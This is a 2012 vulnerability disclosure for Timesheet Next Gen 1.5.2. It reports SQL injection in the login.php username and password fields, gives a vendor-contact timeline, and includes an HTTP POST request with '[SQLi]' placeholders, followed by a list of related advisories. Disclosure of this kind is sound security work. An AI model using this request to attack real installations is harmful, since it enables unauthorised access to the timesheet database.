Timesheet Next Gen 1.5.2 Multiple SQLi



# Exploit Title: Timesheet Next Gen 1.5.2 Multiple SQLi
# Date: 02/23/12
# Author: G13
# Software Link: https://sourceforge.net/projects/tsheetx/
# Version: 1.5.2
# Category: webapps (php)
#

##### Vulnerability #####

The login.php page has multiple SQL injection vulnerabilities. Both
the 'username' and 'password'
parameters are vulnerable to SQL Injection.

The vulnerability exists via the POST method.

##### Vendor Notification #####

02/23/12 - Vendor Notified
02/26/12 - Email sent to each developer, developer responds
02/29/12 - Confirmation by developer requested
03/02/12 - Disclosure

##### Exploit #####

http://localhost/timesheet/

POST /timesheet/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:10.0.2)
Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/timesheet/login.php
Cookie: PHPSESSID=3b624f789e37fa3bdade432da
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
redirect=&username=[SQLi]&password=[SQLi]&Login=submit



Relevant Pages

  • ChurchCMS 0.0.1 admin.php Multiple SQLi
    ... ChurchCMS 0.0.1 'admin.php' Multiple SQLi ... # Software Link: http://sourceforge.net/projects/churchcms/?source=directory ... ChurchCMS is the software to place on your church's website that is ... The vulnerability exists via the POST method. ...
    (Bugtraq)
  • CVE-2014-2570 - php-font-lib 0.3 www/make_subset.php Reflected Cross Site Script
    ... 2014-03-19 - Developer notified. ... The Subset maker of the affected php-font-lib versions is vulnerable ... Vulnerability: Reflected Cross-site Scripting ...
    (Bugtraq)
  • Multiple vulnerabilities in Template CMS
    ... Advisory ID: HTB23115 ... Product: Template CMS ... Vendor Notification: September 12, 2012 ... The following PoC demonstrates the vulnerability: ...
    (Bugtraq)
  • Re: [Full-disclosure] Fwd: 0-DAY XSS of cforms II is now fixed after a year and four months
    ... I think his the response is not good. ... his response to my first contact (and my vulnerability report) wasn't proper. ... Of course actions of Secunia was more harmful, and the developer was of course bad. ... is brought by Rodrigo Branco and Wagner Elias. ...
    (Full-Disclosure)
  • Mod_gzip Debug Mode Vulnerabilities
    ... Developer URL: http://www.sourceforge.net/projects/mod-gzip ... "mod_gzip is an Internet Content Acceleration module for the popular Apache ... Vulnerability Description ... The impact of these issues on production sites should be minimal. ...
    (Bugtraq)